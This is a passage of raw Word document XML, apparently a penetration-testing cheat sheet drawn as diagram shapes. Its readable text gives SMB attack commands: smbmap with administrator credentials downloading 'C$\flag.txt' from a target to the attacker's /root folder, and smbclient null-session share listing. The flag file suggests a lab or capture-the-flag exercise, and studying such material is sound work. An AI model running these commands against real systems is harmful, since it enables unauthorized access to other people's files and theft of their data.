                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>102235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>257912</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1338682" cy="1258215"/>
                <wp:effectExtent l="0" t="0" r="13970" b="1841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1258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B3" w:rsidRDefault="00D628B3" w:rsidP="00D628B3">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00D628B3">
                              <w:t>Downloading file from target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4C1C4" id="Oval 68" o:spid="_x0000_s1066" style="position:absolute;margin-left:8.05pt;margin-top:20.3pt;width:105.4pt;height:9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ckfAIAAE0FAAAOAAAAZHJzL2Uyb0RvYy54bWysVF9P2zAQf5+072D5faQJlHUVKapATJMQ&#10;VIOJZ9exiSXb59luk+7T7+ykAQ20h2l5cO58d7/774vL3miyFz4osDUtT2aUCMuhUfa5pj8ebz4t&#10;KAmR2YZpsKKmBxHo5erjh4vOLUUFLehGeIIgNiw7V9M2RrcsisBbYVg4AScsCiV4wyKy/rloPOsQ&#10;3eiims3Oiw584zxwEQLeXg9Cusr4Ugoe76UMIhJdU4wt5tPnc5vOYnXBls+euVbxMQz2D1EYpiw6&#10;naCuWWRk59UbKKO4hwAynnAwBUipuMg5YDbl7I9sHlrmRM4FixPcVKbw/2D53X7jiWpqeo6dssxg&#10;j+73TBNksTadC0tUeXAbP3IByZRoL71Jf0yB9Lmeh6meoo+E42V5ero4X1SUcJSV1XxRlfOEWryY&#10;Ox/iVwGGJKKmQmvlQsqZLdn+NsRB+6iFpimiIYZMxYMWSVnb70JiHui1ytZ5gsSV9gSzqSnjXNhY&#10;DqKWNWK4ns/wG0OaLHKAGTAhS6X1hD0CpOl8iz3EOuonU5EHcDKe/S2wwXiyyJ7BxsnYKAv+PQCN&#10;WY2eB/1jkYbSpCrFftvnHp/lXNPVFpoDNt7DsBHB8RuFHbhlIW6YxxXAZcG1jvd4SA1dTWGkKGnB&#10;/3rvPunjZKKUkg5Xqqbh5455QYn+ZnFmv5RnGACJmTmbf66Q8a8l29cSuzNXgJ0r8QFxPJNJP+oj&#10;KT2YJ9z+dfKKImY5+q4pj/7IXMVh1fH94GK9zmq4d47FW/vgeAJPhU7j9dg/Me/GMYw4wXdwXL83&#10;ozjoJksL610EqfKcvtR1bAHubJ6l8X1Jj8JrPmu9vIKr3wAAAP//AwBQSwMEFAAGAAgAAAAhANS2&#10;aBHfAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyo3VCFNMSpEFIkisSB&#10;EO5ubBKr8TqKnTb061lOcNvRjGbfFLvFDexkpmA9SlivBDCDrdcWOwnNR3WXAQtRoVaDRyPh2wTY&#10;lddXhcq1P+O7OdWxY1SCIVcS+hjHnPPQ9sapsPKjQfK+/ORUJDl1XE/qTOVu4IkQKXfKIn3o1Wie&#10;e9Me69lJuLxUjY3zts5E83p82+wrz+2nlLc3y9MjsGiW+BeGX3xCh5KYDn5GHdhAOl1TUsJGpMDI&#10;T5J0C+xAx332ALws+P8F5Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACU&#10;AQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAQw33JHwCAABN&#10;BQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA1LZoE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628B3" w:rsidRDefault="00D628B3" w:rsidP="00D628B3">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00D628B3">
                        <w:t>Downloading file from target device</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45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041D8A" wp14:editId="66EDE91C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1608125</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>144856</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4512945" cy="573405"/>
                <wp:effectExtent l="0" t="0" r="20955" b="1714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45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C45" w:rsidRDefault="00F63C45" w:rsidP="00E67F88">
                            <w:r w:rsidRPr="00F63C45">
                              <w:t>smbmap -u administrator -p password -H IP_addr --download "C$\flag.txt"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41D8A" id="Rounded Rectangle 69" o:spid="_x0000_s1067" style="position:absolute;margin-left:126.6pt;margin-top:11.4pt;width:355.35pt;height:45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FMcAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFtr2zAUfh/sPwi9r44zp5cQp4SWjkFp&#10;S9vRZ0WWEjNJR5OU2Nmv35F8aegKG2Mvto7O/Tvf0eKy1YrshfM1mJLmJxNKhOFQ1WZT0m/PN5/O&#10;KfGBmYopMKKkB+Hp5fLjh0Vj52IKW1CVcASDGD9vbEm3Idh5lnm+FZr5E7DCoFKC0yyg6DZZ5ViD&#10;0bXKppPJadaAq6wDLrzH2+tOSZcpvpSCh3spvQhElRRrC+nr0ncdv9lyweYbx+y25n0Z7B+q0Kw2&#10;mHQMdc0CIztX/xZK19yBBxlOOOgMpKy5SD1gN/nkTTdPW2ZF6gXB8XaEyf+/sPxu/+BIXZX09IIS&#10;wzTO6BF2phIVeUT0mNkoQVCHQDXWz9H+yT64XvJ4jF230un4x35Im8A9jOCKNhCOl8Usn14UM0o4&#10;6mZnn4vJLAbNXr2t8+GLAE3ioaQulhFrSMCy/a0Pnf1gh86xpK6IdAoHJWIdyjwKiV1h2jx5Jz6J&#10;K+XIniETGOfChCF/so5uslZqdJz+2bG3j64icW10/ouso0fKDCaMzro24N7LXn3Pe8hkZz8g0PUd&#10;IQjtuk3jLJJpvFpDdcAZO+jI7y2/qRHgW+bDA3PIdtwL3OBwjx+poCkp9CdKtuB+vncf7ZGEqKWk&#10;we0pqf+xY05Qor4apOdFXhRx3ZJQzM6mKLhjzfpYY3b6CnAsOb4VlqdjtA9qOEoH+gUXfRWzoooZ&#10;jrlLyoMbhKvQbTU+FVysVskMV8yycGueLB+IELnz3L4wZ3uWBeTnHQybxuZveNbZxhEZWO0CyDqR&#10;8BXXfgS4nonL/VMS9/9YTlavD97yFwAAAP//AwBQSwMEFAAGAAgAAAAhAKJbZjrcAAAACgEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj8tOxDAMRfdI/ENkJHZM2hTmUZqOGAQLlgx8QKbxtNU0TtWkD/h6&#10;zAp2tnx0fW6xX1wnJhxC60lDukpAIFXetlRr+Px4vduCCNGQNZ0n1PCFAfbl9VVhcutnesfpGGvB&#10;IRRyo6GJsc+lDFWDzoSV75H4dvaDM5HXoZZ2MDOHu06qJFlLZ1riD43p8bnB6nIcnYYXezjbtwuN&#10;m4ML/fd8r0wyKa1vb5anRxARl/gHw68+q0PJTic/kg2i06AeMsUoD4orMLBbZzsQJybTLAVZFvJ/&#10;hfIHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtD&#10;b250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAA&#10;AAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAEC6RTHACAAA4BQAADgAAAAAAAAAAAAAA&#10;AAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAoltmOtwAAAAKAQAADwAAAAAAAAAA&#10;AAAAAADK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F63C45" w:rsidRDefault="00F63C45" w:rsidP="00E67F88">
                      <w:r w:rsidRPr="00F63C45">
                        <w:t>smbmap -u administrator -p password -H IP_addr --download "C$\flag.txt"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3C45" w:rsidRDefault="00F63C45" w:rsidP="007D28B7"/>
    <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="00F63C45" w:rsidP="007D28B7">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidR="007D28B7" w:rsidRPr="007D28B7">
        <w:t>- File</w:t>
      </w:r>
      <w:r w:rsidR="004A29C7">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007D28B7" w:rsidRPr="007D28B7">
        <w:t xml:space="preserve"> will be downloaded to the attacker device's “/root” folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="00F63C45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152025" wp14:editId="697F1949">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1141171</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>115392</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3533242" cy="498143"/>
                <wp:effectExtent l="0" t="0" r="10160" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="70" name="Round Same Side Corner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45" w:rsidRPr="003229F4" w:rsidRDefault="00F63C45" w:rsidP="00476B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63C45">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>smbclient Connection with Null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25" id="Round Same Side Corner Rectangle 70" o:spid="_x0000_s1068" style="position:absolute;margin-left:89.85pt;margin-top:9.1pt;width:278.2pt;height:39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3242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UIfgIAAEgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0Xx0n6SuoUwQpOgwI&#10;2qLp0LMiS4kBWdQoJXb260fJTlK0vWzYRSbNh8iPH3Vz29aG7RT6CmzB87MBZ8pKKCu7LvjPl/tv&#10;V5z5IGwpDFhV8L3y/Hb69ctN4yZqCBswpUJGSayfNK7gmxDcJMu83Kha+DNwypJRA9YikIrrrETR&#10;UPbaZMPB4CJrAEuHIJX39PeuM/Jpyq+1kuFRa68CMwWn2kI6MZ2reGbTGzFZo3CbSvZliH+oohaV&#10;pUuPqe5EEGyL1YdUdSURPOhwJqHOQOtKqtQDdZMP3nWz3AinUi8EjndHmPz/Sysfdk/IqrLglwSP&#10;FTXN6Bm2tmRLktmyKhWbA1oa0jOBKezaKEauhFvj/ITCl+4Je82TGEFoNdbxS+2xNmG9P2Kt2sAk&#10;/Rydj0bD8ZAzSbbx9VU+HsWk2SnaoQ/fFdQsCgXHWNUwVhULSWCL3cKHLujgTBliXV0lSQp7o2Ix&#10;xj4rTZ3Gu1N04piaG2Q7QewwIe8LSJ4xRFfGHIPyz4KElMqGiz6w94+hKnHvb4KPEelmsOEYXFcW&#10;8LPbTyXrzv/QfddzbD+0qzaNl6Dup7SCck8zR+iWwTt5XxHCC+HDk0BiPxGBNjo80qENNAWHXuJs&#10;A/j7s//Rn0hJVs4a2qaC+19bgYoz88MSXa/z8TiuX1LG55dDUvCtZfXWYrf1HGgkOb0dTiYx+gdz&#10;EDVC/UqLP4u3kklYSXcXXAY8KPPQbTk9HVLNZsmNVs6JsLBLJ2PyCHTkzUv7KtD1NAtE0Ac4bJ6Y&#10;vONY5xsjLcy2AXSVCBih7nDtR0DrmsjcPy3xPXirJ6/TAzj9AwAA//8DAFBLAwQUAAYACAAAACEA&#10;X3SPveAAAAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwUrEMBCG74LvEEbwIm7aqm23Nl1EEPGy&#10;4KqIt2wz2y5tJqXJtvXtHU96m5/5+OebcrPYXkw4+qMjBfEqAoFUO3OkRsH729N1DsIHTUb3jlDB&#10;N3rYVOdnpS6Mm+kVp11oBJeQL7SCNoShkNLXLVrtV25A4t3BjVYHjmMjzahnLre9TKIolVYfiS+0&#10;esDHFutud7IK7kJ39flyi89xMpkc569ue/iIlLq8WB7uQQRcwh8Mv/qsDhU77d2JjBc952ydMcpD&#10;noBgILtJYxB7Bes0BVmV8v8H1Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAZXllCH4C&#10;AABIBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAX3SP&#10;veAAAAAJAQAADwAAAAAAAAAAAAAAAADYBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAA&#10;AOUFAAAAAA==&#10;" adj="-11796480,,5400" path="m83025,l3450217,v45853,,83025,37172,83025,83025l3533242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3450217,0;3533242,83025;3533242,498143;3533242,498143;0,498143;0,498143;0,83025;83025,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,3533242,498143"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00F63C45" w:rsidRPr="003229F4" w:rsidRDefault="00F63C45" w:rsidP="00476B3F">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00F63C45">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>smbclient Connection with Null Session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7D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRPr="007D28B7" w:rsidRDefault="008D602E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0206C0" wp14:editId="06C9D277">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2691917</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>38735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="457200" cy="497205"/>
                <wp:effectExtent l="19050" t="0" r="38100" b="36195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7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1FFC" id="Down Arrow 93" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:211.95pt;margin-top:3.05pt;width:36pt;height:39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QxdAIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X51k6bYEcYqgRYcB&#10;RVs0HXpWZKk2IIkapcTJfv0o2XGKtthhmA8yJZKPH3rU4mJvDdspDA24ko/PRpwpJ6Fq3HPJfz5e&#10;f/rGWYjCVcKAUyU/qMAvlh8/LFo/VxOowVQKGYG4MG99yesY/bwogqyVFeEMvHKk1IBWRNric1Gh&#10;aAndmmIyGn0pWsDKI0gVAp1edUq+zPhaKxnvtA4qMlNyyi3mFfO6SWuxXIj5MwpfN7JPQ/xDFlY0&#10;joIOUFciCrbF5g2UbSRCAB3PJNgCtG6kyjVQNePRq2rWtfAq10LNCX5oU/h/sPJ2d4+sqUo++8yZ&#10;E5bu6Apax1aI0DI6pA61PszJcO3vsd8FElO5e402/akQts9dPQxdVfvIJB1Oz7/STXEmSTWdkXye&#10;MIuTs8cQvyuwLAklryh8jp4bKnY3IXb2RztyThl1OWQpHoxKaRj3oDRVQ1En2TvzSF0aZDtBDBBS&#10;KhfHnaoWleqOz0f09UkNHjnFDJiQdWPMgN0DJI6+xe5y7e2Tq8o0HJxHf0uscx48cmRwcXC2jQN8&#10;D8BQVX3kzv7YpK41qUsbqA501wjdEAQvrxtq+I0I8V4gsZ7uiCY53tGiDbQlh17irAb8/d55sicy&#10;kpazlqao5OHXVqDizPxwRNPZeDpNY5c3mQic4UvN5qXGbe0l0DWN6c3wMovkjNEcRY1gn2jgVykq&#10;qYSTFLvkMuJxcxm76aYnQ6rVKpvRqHkRb9zaywSeupq49Lh/Euh71kWi6y0cJ07MX/Gus02eDlbb&#10;CLrJpDz1te83jWkmTv+kpHfg5T5bnR6+5R8AAAD//wMAUEsDBBQABgAIAAAAIQCbe9rO3gAAAAgB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT4NAFITvJv6HzTPxZpdSbAryaIxpL8YerF68vcITSNld&#10;ZLeA/97nSY+Tmcx8k29n06mRB986i7BcRKDYlq5qbY3w/ra/24DygWxFnbOM8M0etsX1VU5Z5Sb7&#10;yuMx1EpKrM8IoQmhz7T2ZcOG/ML1bMX7dIOhIHKodTXQJOWm03EUrbWh1spCQz0/NVyejxeDMB1m&#10;0h+7tN3to5d4dXbPh3j8Qry9mR8fQAWew18YfvEFHQphOrmLrbzqEJJ4lUoUYb0EJX6S3os+IWyS&#10;BHSR6/8Hih8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAKXeEMXQCAABABQAADgAAAAAA&#10;AAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAm3vazt4AAAAIAQAADwAA&#10;AAAAAAAAAAAAAADOBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANkFAAAAAA==&#10;" adj="11669" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D28B7" w:rsidRPr="007D28B7" w:rsidRDefault="00276B73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641447" wp14:editId="6F6AC5FA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>160756</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>208179</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2640076" cy="643255"/>
                <wp:effectExtent l="0" t="0" r="27305" b="234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076" cy="6432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F63C45" w:rsidP="00E67F88">
                            <w:r>
                              <w:t>smbclient –h</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="00F63C45">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&gt;&gt; Help</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="007D28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41447" id="Rounded Rectangle 30" o:spid="_x0000_s1069" style="position:absolute;margin-left:12.65pt;margin-top:16.4pt;width:207.9pt;height:5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DicAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtOGzEQfa/Uf7D8XjY3Ao2yQRGIqhIC&#10;BFQ8O147WdXrccdOdtOv79h7AVGkVlVfvJ6d+5kzXl40lWEHhb4Em/PxyYgzZSUUpd3m/NvT9adz&#10;znwQthAGrMr5UXl+sfr4YVm7hZrADkyhkFEQ6xe1y/kuBLfIMi93qhL+BJyypNSAlQgk4jYrUNQU&#10;vTLZZDSaZzVg4RCk8p7+XrVKvkrxtVYy3GntVWAm51RbSCemcxPPbLUUiy0KtytlV4b4hyoqUVpK&#10;OoS6EkGwPZa/hapKieBBhxMJVQZal1KlHqib8ehNN4874VTqhcDxboDJ/7+w8vZwj6wscj4leKyo&#10;aEYPsLeFKtgDoSfs1ihGOgKqdn5B9o/uHjvJ0zV23Wis4pf6YU0C9ziAq5rAJP2czGej0dmcM0m6&#10;+Ww6OT2NQbMXb4c+fFFQsXjJOcYyYg0JWHG48aG17+3IOZbUFpFu4WhUrMPYB6WpK0o7Tt6JT+rS&#10;IDsIYoKQUtnQ50/W0U2XxgyOkz87dvbRVSWuDc5/kXXwSJnBhsG5Ki3ge9mL7+MOMt3a9wi0fUcI&#10;QrNp0jhn035kGyiONGOElvzeyeuSAL4RPtwLJLbT4GmDwx0d2kCdc+hunO0Af773P9oTCUnLWU3b&#10;k3P/Yy9QcWa+WqLn5/FsFtctCbPTswkJ+Fqzea2x++oSaCxjeiucTNdoH0x/1QjVMy36OmYllbCS&#10;cudcBuyFy9BuNT0VUq3XyYxWzIlwYx+d7IkQufPUPAt0HcsC8fMW+k0Tizc8a23jiCys9wF0mUgY&#10;oW5x7UZA65m43D0lcf9fy8nq5cFb/QIAAP//AwBQSwMEFAAGAAgAAAAhAPqoM8fcAAAACQEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyoEydAlcapKIIFSwof4MbTJGo8jmLnAV/P&#10;sILl6B7dObfcr64XM46h86Qh3SQgkGpvO2o0fH683m1BhGjImt4TavjCAPvq+qo0hfULveN8jI3g&#10;EgqF0dDGOBRShrpFZ8LGD0icnf3oTORzbKQdzcLlrpcqSR6kMx3xh9YM+NxifTlOTsOLPZzt24Wm&#10;x4MLw/eSK5PMSuvbm/VpByLiGv9g+NVndajY6eQnskH0GtR9xqSGTPECzvM8TUGcGMzyFGRVyv8L&#10;qh8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtD&#10;b250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAA&#10;AAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAow2g4nACAAA4BQAADgAAAAAAAAAAAAAA&#10;AAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA+qgzx9wAAAAJAQAADwAAAAAAAAAA&#10;AAAAAADK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F63C45" w:rsidP="00E67F88">
                      <w:r>
                        <w:t>smbclient –h</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="00F63C45">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t>&gt;&gt; Help</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="007D28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67F8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F3319D" wp14:editId="2EC31C1E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3079699</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>84023</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3101340" cy="914400"/>
                <wp:effectExtent l="0" t="0" r="22860" b="1905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C45" w:rsidRDefault="00F63C45" w:rsidP="00E67F88">
                            <w:r>
                              <w:t xml:space="preserve">smbclient -L IP_addr </w:t>
                            </w:r>
                            <w:r w:rsidR="00276B73">
                              <w:t>–N</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00276B73" w:rsidRDefault="00276B73" w:rsidP="00276B73">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">&gt;&gt; </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>-N= No password = Null session</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="00F63C45">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&gt;&gt; -</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00F63C45">
                              <w:t>L = List of Hosts</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="007D28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3319D" id="Rounded Rectangle 71" o:spid="_x0000_s1070" style="position:absolute;margin-left:242.5pt;margin-top:6.6pt;width:244.2pt;height:1in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r+cgIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95GmlLFVTVFVxDQJ&#10;AQImPruO3UZzfN7ZbdL9+p2dFxBD2jTti+PLvT/3nBcXbW3YQaGvwBY8P5lwpqyEsrLbgn97vPrw&#10;iTMfhC2FAasKflSeXyzfv1s0bq6msANTKmQUxPp54wq+C8HNs8zLnaqFPwGnLCk1YC0CibjNShQN&#10;Ra9NNp1MPmYNYOkQpPKe/l52Sr5M8bVWMtxq7VVgpuBUW0gnpnMTz2y5EPMtCrerZF+G+IcqalFZ&#10;SjqGuhRBsD1Wv4WqK4ngQYcTCXUGWldSpR6om3zyqpuHnXAq9ULgeDfC5P9fWHlzuENWlQU/zzmz&#10;oqYZ3cPelqpk94SesFujGOkIqMb5Odk/uDvsJU/X2HWrsY5f6oe1CdzjCK5qA5P08zSf5KczmoEk&#10;3ed8Npsk9LNnb4c+fFFQs3gpOMYyYg0JWHG49oHSkv1gR0IsqSsi3cLRqFiHsfdKU1eUNk/eiU9q&#10;bZAdBDFBSKlsOItNUbxkHd10ZczoOP2zY28fXVXi2uj8F1lHj5QZbBid68oCvpW9/J7mQCXrzn5A&#10;oOs7QhDaTZvGOZsNI9tAeaQZI3Tk905eVQTwtfDhTiCxnWZCGxxu6dAGmoJDf+NsB/jzrf/RnkhI&#10;Ws4a2p6C+x97gYoz89USPdN8ad2SMDs7n1IOfKnZvNTYfb0GGgsxkKpL12gfzHDVCPUTLfoqZiWV&#10;sJJyF1wGHIR16LaangqpVqtkRivmRLi2D04ORIjceWyfBLqeZYH4eQPDpon5K551tnFEFlb7ALpK&#10;JIxQd7j2I6D1TFzqn5K4/y/lZPX84C1/AQAA//8DAFBLAwQUAAYACAAAACEAWEBWi90AAAAKAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPzU7DMBCE70i8g7VI3KiDm5IS4lQUwYFjCw/gxtskaryOYucH&#10;np7lBMedGc1+U+wW14kJh9B60nC/SkAgVd62VGv4/Hi724II0ZA1nSfU8IUBduX1VWFy62c64HSM&#10;teASCrnR0MTY51KGqkFnwsr3SOyd/eBM5HOopR3MzOWukypJHqQzLfGHxvT40mB1OY5Ow6vdn+37&#10;hcZs70L/PafKJJPS+vZmeX4CEXGJf2H4xWd0KJnp5EeyQXQa0u2Gt0Q21goEBx6zdQrixMImUyDL&#10;Qv6fUP4AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAu3A6/nICAAA4BQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAWEBWi90AAAAKAQAADwAAAAAA&#10;AAAAAAAAAADM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F63C45" w:rsidRDefault="00F63C45" w:rsidP="00E67F88">
                      <w:r>
                        <w:t xml:space="preserve">smbclient -L IP_addr </w:t>
                      </w:r>
                      <w:r w:rsidR="00276B73">
                        <w:t>–N</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00276B73" w:rsidRDefault="00276B73" w:rsidP="00276B73">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">&gt;&gt; </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>-N= No password = Null session</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="00F63C45">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t>&gt;&gt; -</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00F63C45">
                        <w:t>L = List of Hosts</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="007D28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D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="00F63C45" w:rsidRDefault="00F63C45" w:rsidP="007D28B7"/>
    <w:p w:rsidR="004A29C7" w:rsidRDefault="004A29C7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="00F63C45" w:rsidRDefault="00E67F88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5BC636" wp14:editId="77CFF662">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1082040</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>83439</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3533242" cy="498143"/>
                <wp:effectExtent l="0" t="0" r="10160" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="73" name="Round Same Side Corner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C45" w:rsidRPr="003229F4" w:rsidRDefault="00F63C45" w:rsidP="00476B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63C45">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
